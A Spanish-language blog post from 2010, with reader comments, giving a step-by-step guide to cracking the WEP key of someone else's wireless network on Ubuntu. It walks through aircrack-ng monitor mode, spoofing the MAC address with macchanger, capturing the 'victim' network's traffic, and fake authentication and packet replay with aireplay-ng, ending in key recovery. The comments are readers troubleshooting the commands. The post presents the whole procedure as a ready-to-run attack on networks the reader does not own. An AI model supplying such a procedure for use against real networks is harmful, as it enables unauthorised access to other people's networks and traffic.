sábado, 7 de agosto de 2010

COMO HACKEAR UNA RED WIFI UTILIZANDO UBUNTU

Recuerda que tienes que deshabilitar tu red inalámbrica con click derecho muy importante 
Todo esto háganlo como súper usuario
Esto es con el comando sudo su
Esto les pedirá su password

Lo primero es instalar la Suite aircrack-ng 


# apt-get install aircrack-ng

Luego instalamos Macchanger 


# apt-get install macchanger

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalámbrica, dando click derecho en el icono de la red y desactivando la red inalámbrica, y abrimos una terminal:

- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR) 


#airmon-ng start wlan0


- Vemos que nos sale que se activó en mon0, asi es que trabajaremos con mon0

-Damos de Baja mon0 


#ifconfig mon0 down

-Cambiamos la dirección mac de mon0 por 00:11:22:33:44:55 

#macchanger -m 00:11:22:33:44:55 mon0


- Damos de alta mon0 


#ifconfig mon0 up


- Escaneamos las redes disponibles, y encontraremos nuestra victima 


#airodump-ng mon0


- Detenemos la escaneada pulsando 

Apunta el nombre de la red tal como está he weii jejejeje
Su dirección mac
Y su canal 

control – c


- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima 


airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0



- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red
- Cambiando los datos de los corchetes por los de nuestra victima
#aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0


- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.

#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direction MAC] -h 00:11:22:33:44:55 mon0

- Le decimos que si (y) y le damos enter

- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima. 


#aircrack-ng -z [nombre red]*.cap

Y ESPERA EN UNOS CUANTOS MINUTOS TE DARA LA CLAVE CON UN FORMATO MASO MENOS ASI:

KEY FOUND ¡
89:44:56:67
SI TE DICE QUE NO HAY SUFICIENTES IVS ESPERA OTRO RATO Y VUELVE A INTERTAR LO ULTIMO


RECUERDA QUE ESTO SOLO SIRVE PARA WEP 

8 comentarios:

  1. Nótese que la distro "WiFiway" trae una forma más fácil para hacerlo. E incluso, trae la opción del diccionario para las WPA.

    Aunque igual es interesante notar que esto es sólo con fines de auditoría.

    Y nótese la diferencia entre hackear y crackear.

    Saludos.


    PD: Recuerda que las mayúsculas, por orden internacional socialmente aceptado, representan que estás gritando. xD. Conste que es sólo un comentario.

    Ciao.

    ResponderEliminar
  2. Tengo un problema al llegar al final. Llevo poco tiempo con Linux pero lo suficiente como para mandar a windows a tomar por el c***.

    Vereis el error que me sale es algo asi como este:

    # aircrack-ng -z ejemplo*.cap
    Opening ejemplo*.cap
    open failed: No sucj file or directory
    Read 0 packets. No networks found exiting.

    Aver si podeis echarme un cable. Gracias

    ResponderEliminar
  3. hola,soy dani novato en ubuntu pero me encanta...tengo un problemilla,aver si alguien me puede hechar un cable,se agradece de antemano daniel2005@daniel2005-laptop:~$ sudo apt-get install aircrack-ng
    Leyendo lista de paquetes... Hecho
    Creando árbol de dependencias
    Leyendo la información de estado... Hecho
    aircrack-ng ya está en su versión más reciente.
    Se instalaron de forma automática los siguientes paquetes y ya no son necesarios.
    linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic
    Utilice «apt-get autoremove» para eliminarlos.
    0 actualizados, 0 se instalarán, 0 para eliminar y 0 no actualizados.
    daniel2005@daniel2005-laptop:~$ apt-get install macchanger
    E: No se pudo abrir el fichero de bloqueo '/var/lib/dpkg/lock' - open (13: Permiso denegado)
    E: Imposible bloquear el directorio de administración (/var/lib/dpkg/), ¿es superusuario?
    daniel2005@daniel2005-laptop:~$

    ResponderEliminar
    Respuestas
    1. Esto es por que no te has logeado como super usuario

      Saludos

      Eliminar
  4. cuando le doy airodump-ng eth01 me sale el siguiente error:
    ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
    Sysfs injection support was not found either.

    Por favor ayuda, qué podrá ser?

    ResponderEliminar
  5. Hola,
    Gracias por escribir esta entrada, pero tengo un problema en el comando "aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0", el cual me dice:
    mon0 is on channel -1, but the AP uses channel 13
    ¿Alguien sabe a qué se debe?
    Me he asegurado de matar todos los procesos que aparecen al ejecutar "airmon-ng check".

    Gracias.

    ResponderEliminar